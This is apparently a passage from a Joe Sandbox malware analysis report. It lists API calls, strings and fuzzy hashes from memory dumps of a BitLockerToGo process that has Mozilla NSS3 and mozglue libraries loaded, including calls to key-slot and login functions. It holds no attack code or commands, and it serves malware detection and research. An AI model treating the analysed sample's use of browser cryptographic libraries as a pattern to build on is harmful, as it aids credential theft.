                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3714604333-0
                                                                                                                                                      • Opcode ID: 16a2b356f995e81ae8b222f1aaaab24128ed3b67d93dc4a2834a1f462a84ded7
                                                                                                                                                      • Instruction ID: 3a864dad18365c35d4c4ffc23d0d92d5afd2211acddc0461f3a7b9d96d892cb8
                                                                                                                                                      • Opcode Fuzzy Hash: 16a2b356f995e81ae8b222f1aaaab24128ed3b67d93dc4a2834a1f462a84ded7
                                                                                                                                                      • Instruction Fuzzy Hash: 51214E7150D304ABEB104E188C02B9A77E4AF9572CF144314FC549BBD1EB31D95D87A7
                                                                                                                                                      APIs
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C99EE85
                                                                                                                                                      • realloc.MOZGLUE(D7D7AACF,?), ref: 6C99EEAE
                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C99EEC5
                                                                                                                                                        • Part of subcall function 6C970BE0: malloc.MOZGLUE(6C968D2D,?,00000000,?), ref: 6C970BF8
                                                                                                                                                        • Part of subcall function 6C970BE0: TlsGetValue.KERNEL32(6C968D2D,?,00000000,?), ref: 6C970C15
                                                                                                                                                      • htonl.WSOCK32(?), ref: 6C99EEE3
                                                                                                                                                      • htonl.WSOCK32(00000000,?), ref: 6C99EEED
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C99EF01
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1351805024-0
                                                                                                                                                      • Opcode ID: b5834885eca9027dd7ec41993c2a196520aab9e69677678a9a8086db6d9b190b
                                                                                                                                                      • Instruction ID: 36fa7fb1253623c4c66fa3b59bdddab1a9bb0cacf52b1477ff1da236eee99e3a
                                                                                                                                                      • Opcode Fuzzy Hash: b5834885eca9027dd7ec41993c2a196520aab9e69677678a9a8086db6d9b190b
                                                                                                                                                      • Instruction Fuzzy Hash: 5521D331A002259FDF109F68DC8079A77A8EF49358F198129EC099B641E330EC54CBE2
                                                                                                                                                      APIs
                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C7FEB57,?,?,?,?,?,?,?,?,?), ref: 6C82D652
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C7FEB57,?), ref: 6C82D660
                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C7FEB57,?), ref: 6C82D673
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C82D888
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$memsetmoz_xmalloc
                                                                                                                                                      • String ID: |Enabled
                                                                                                                                                      • API String ID: 4142949111-2633303760
                                                                                                                                                      • Opcode ID: 619e0ad1664e0977f0eae50f645cb528fa59f5df356e7864c8a5878606ef89ff
                                                                                                                                                      • Instruction ID: c96a7f5e5a6dbfba376b43a6f0426693bd2f7060e91537d94baa9e1ec962c03f
                                                                                                                                                      • Opcode Fuzzy Hash: 619e0ad1664e0977f0eae50f645cb528fa59f5df356e7864c8a5878606ef89ff
                                                                                                                                                      • Instruction Fuzzy Hash: C8A1F770A042188FDB21CF69C588BAEBFF1AF49318F14486DD8956B741D738A885CBE1
                                                                                                                                                      APIs
                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8FAFDA
                                                                                                                                                      Strings
                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C8FAFD3
                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8FAFC4
                                                                                                                                                      • misuse, xrefs: 6C8FAFCE
                                                                                                                                                      • unable to delete/modify collation sequence due to active statements, xrefs: 6C8FAF5C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                      • API String ID: 632333372-924978290
                                                                                                                                                      • Opcode ID: 39e95bad347e58c0db0512c24f094bf5906a8b4be16ded376711b13cf7e98ee9
                                                                                                                                                      • Instruction ID: 5edbd7b64772aa8cdaf111a0fe399ca70774eeec597e315eb8b97aabe16dd715
                                                                                                                                                      • Opcode Fuzzy Hash: 39e95bad347e58c0db0512c24f094bf5906a8b4be16ded376711b13cf7e98ee9
                                                                                                                                                      • Instruction Fuzzy Hash: 0B91D175B002158FEB24CF59C950AEAB7F1FF49364F1989A8E865AB751C334ED02CB60
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C82F480
                                                                                                                                                        • Part of subcall function 6C7FF100: LoadLibraryW.KERNEL32(shell32,?,6C86D020), ref: 6C7FF122
                                                                                                                                                        • Part of subcall function 6C7FF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C7FF132
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 6C82F555
                                                                                                                                                        • Part of subcall function 6C8014B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C801248,6C801248,?), ref: 6C8014C9
                                                                                                                                                        • Part of subcall function 6C8014B0: memcpy.VCRUNTIME140(?,6C801248,00000000,?,6C801248,?), ref: 6C8014EF
                                                                                                                                                        • Part of subcall function 6C7FEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C7FEEE3
                                                                                                                                                      • CreateFileW.KERNEL32 ref: 6C82F4FD
                                                                                                                                                      • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C82F523
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                      • String ID: \oleacc.dll
                                                                                                                                                      • API String ID: 2595878907-3839883404
                                                                                                                                                      • Opcode ID: 2681d241c04afef4dc79391f5c304fb944ad57770b5efa4de52e86d5a2271b2a
                                                                                                                                                      • Instruction ID: 240e8fd86b2df5a24f7c646c76edce8b12a1afc3ba5e5baf4678cfc5731de2f4
                                                                                                                                                      • Opcode Fuzzy Hash: 2681d241c04afef4dc79391f5c304fb944ad57770b5efa4de52e86d5a2271b2a
                                                                                                                                                      • Instruction Fuzzy Hash: 834194706087209FD731DF69CA88A9BB7F4AF54318F100E28F59187650EB34D589CBE2
                                                                                                                                                      APIs
                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 6C857526
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C857566
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C857597
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                      • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                      • API String ID: 3217676052-1401603581
                                                                                                                                                      • Opcode ID: bbdadff84050618fc755b2b011a2f984f422787253c42f63775b04dcdac31621
                                                                                                                                                      • Instruction ID: 00aaa1cbb94b7e2b5f346c432d2e62dc947329f94610250e86c595df2f827d4a
                                                                                                                                                      • Opcode Fuzzy Hash: bbdadff84050618fc755b2b011a2f984f422787253c42f63775b04dcdac31621
                                                                                                                                                      • Instruction Fuzzy Hash: 99210B31701590ABCB358BAA8A19E9E33B5EB47368B50CD39D40587F40E764A851C6F1
                                                                                                                                                      APIs
                                                                                                                                                      • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C900BDE), ref: 6C900DCB
                                                                                                                                                      • strrchr.VCRUNTIME140(00000000,0000005C,?,6C900BDE), ref: 6C900DEA
                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C900BDE), ref: 6C900DFC
                                                                                                                                                      • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C900BDE), ref: 6C900E32
                                                                                                                                                      Strings
                                                                                                                                                      • %s incr => %d (find lib), xrefs: 6C900E2D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: strrchr$Print_stricmp
                                                                                                                                                      • String ID: %s incr => %d (find lib)
                                                                                                                                                      • API String ID: 97259331-2309350800
                                                                                                                                                      • Opcode ID: c90b1a9d7894c608f4644048884a96d9b302f48ac67b220785ec690cd615e415
                                                                                                                                                      • Instruction ID: ad4118e66113dcee87bf7bf10f1db7c9b64d086e6a361a2cb284bb60a18daa18
                                                                                                                                                      • Opcode Fuzzy Hash: c90b1a9d7894c608f4644048884a96d9b302f48ac67b220785ec690cd615e415
                                                                                                                                                      • Instruction Fuzzy Hash: 630124727003209FE7209F248C45E6773FCEB45A09B09882DE909E3A41E761FC9986F1
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6C85C0E9), ref: 6C85C418
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C85C437
                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C85C0E9), ref: 6C85C44C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                      • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                      • API String ID: 145871493-2623246514
                                                                                                                                                      • Opcode ID: c676a176ed21b1de28c457654bb47c058b226bfe40afd5bf98d34b4ccb2b149f
                                                                                                                                                      • Instruction ID: 1254a80bcfa3088251a6d12a8b92f72d3fbc6391bfc38d5a1a497fb525291b1a
                                                                                                                                                      • Opcode Fuzzy Hash: c676a176ed21b1de28c457654bb47c058b226bfe40afd5bf98d34b4ccb2b149f
                                                                                                                                                      • Instruction Fuzzy Hash: FFE09A716053319BDB326BB28A0CB1A7BF9A75B21DF084535EA1592701FBB0D010CBB1
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6C85748B,?), ref: 6C8575B8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C8575D7
                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C85748B,?), ref: 6C8575EC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                      • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                      • API String ID: 145871493-3641475894
                                                                                                                                                      • Opcode ID: 8e53a052b63ad105b7041e3daa60ad3d350b9619d3646f0421c269a6e86e0e69
                                                                                                                                                      • Instruction ID: eb21b092155d9db6cc59543da46ebcd9d531c45f6bce389bf1ee7b6cacb80270
                                                                                                                                                      • Opcode Fuzzy Hash: 8e53a052b63ad105b7041e3daa60ad3d350b9619d3646f0421c269a6e86e0e69
                                                                                                                                                      • Instruction Fuzzy Hash: 19E0E5B22003A1ABDB325BA2894C7193AF8EB5329CF00C435E90882700FBB89041CFB0
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C90EDFD
                                                                                                                                                      • calloc.MOZGLUE(00000001,00000000), ref: 6C90EE64
                                                                                                                                                      • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C90EECC
                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C90EEEB
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C90EEF6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3833505462-0
                                                                                                                                                      • Opcode ID: fdc97da53799621a0c6120d20c4d066e35a13594e268dd3d90453b0d6104adb8
                                                                                                                                                      • Instruction ID: dd58fce0ea965a952f2156d5af965d59149290ea6d5d88a7927736ef7802a8be
                                                                                                                                                      • Opcode Fuzzy Hash: fdc97da53799621a0c6120d20c4d066e35a13594e268dd3d90453b0d6104adb8
                                                                                                                                                      • Instruction Fuzzy Hash: DB313772B00319DBEB209F28CC447667BF8FB46305F14462CE99A87A50D731E855CBE1
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 6C7FB532
                                                                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C7FB55B
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C7FB56B
                                                                                                                                                      • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C7FB57E
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C7FB58F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4244350000-0
                                                                                                                                                      • Opcode ID: 05150207e4e53adcf7e57740a8077d62bd5afdcddbe953fe50a71f6ab74c4e8b
                                                                                                                                                      • Instruction ID: 120b9d5d34843048136ce6891e50e42a69f8bfbab7b37ab80c7f4e34247fc54a
                                                                                                                                                      • Opcode Fuzzy Hash: 05150207e4e53adcf7e57740a8077d62bd5afdcddbe953fe50a71f6ab74c4e8b
                                                                                                                                                      • Instruction Fuzzy Hash: 4F21F871A04205DBDB018F69CD84B6EBBB9FF42308F284039E824DB341E775E912C7A1
                                                                                                                                                      APIs
                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(00000000,?,6C913FFF,00000000,?,?,?,?,?,6C911A1C,00000000,00000000), ref: 6C91ADA7
                                                                                                                                                        • Part of subcall function 6C9714C0: TlsGetValue.KERNEL32 ref: 6C9714E0
                                                                                                                                                        • Part of subcall function 6C9714C0: EnterCriticalSection.KERNEL32 ref: 6C9714F5
                                                                                                                                                        • Part of subcall function 6C9714C0: PR_Unlock.NSS3 ref: 6C97150D
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C913FFF,00000000,?,?,?,?,?,6C911A1C,00000000,00000000), ref: 6C91ADB4
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                        • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                        • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                        • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,6C913FFF,?,?,?,?,6C913FFF,00000000,?,?,?,?,?,6C911A1C,00000000), ref: 6C91ADD5
                                                                                                                                                        • Part of subcall function 6C96FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C968D2D,?,00000000,?), ref: 6C96FB85
                                                                                                                                                        • Part of subcall function 6C96FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C96FBB1
                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CA394B0,?,?,?,?,?,?,?,?,6C913FFF,00000000,?), ref: 6C91ADEC
                                                                                                                                                        • Part of subcall function 6C96B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA418D0,?), ref: 6C96B095
                                                                                                                                                      • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C913FFF), ref: 6C91AE3C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2372449006-0
                                                                                                                                                      • Opcode ID: 2a91d0e4a008d814da67ed1c9f4746067c1a225c2dfc581e2951420212d47a59
                                                                                                                                                      • Instruction ID: 4c6eb5ca33f9c3df2153467910b49df661f80c3ace56703b5fc278dcfe51ee4f
                                                                                                                                                      • Opcode Fuzzy Hash: 2a91d0e4a008d814da67ed1c9f4746067c1a225c2dfc581e2951420212d47a59
                                                                                                                                                      • Instruction Fuzzy Hash: BD112671E042196BF7109A659C52BBF73BCDFB124CF048228EC5996A41FB20E95D82A2
                                                                                                                                                      APIs
                                                                                                                                                      • PK11_GetInternalKeySlot.NSS3(?,?,?,6C952E62,?,?,?,?,?,?,?,00000000,?,?,?,6C924F1C), ref: 6C938EA2
                                                                                                                                                        • Part of subcall function 6C95F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C95F854
                                                                                                                                                        • Part of subcall function 6C95F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C95F868
                                                                                                                                                        • Part of subcall function 6C95F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C95F882
                                                                                                                                                        • Part of subcall function 6C95F820: free.MOZGLUE(04C483FF,?,?), ref: 6C95F889
                                                                                                                                                        • Part of subcall function 6C95F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C95F8A4
                                                                                                                                                        • Part of subcall function 6C95F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C95F8AB
                                                                                                                                                        • Part of subcall function 6C95F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C95F8C9
                                                                                                                                                        • Part of subcall function 6C95F820: free.MOZGLUE(280F10EC,?,?), ref: 6C95F8D0
                                                                                                                                                      • PK11_IsLoggedIn.NSS3(?,?,?,6C952E62,?,?,?,?,?,?,?,00000000,?,?,?,6C924F1C), ref: 6C938EC3
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6C952E62,?,?,?,?,?,?,?,00000000,?,?,?,6C924F1C), ref: 6C938EDC
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6C952E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C938EF1
                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C938F20
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
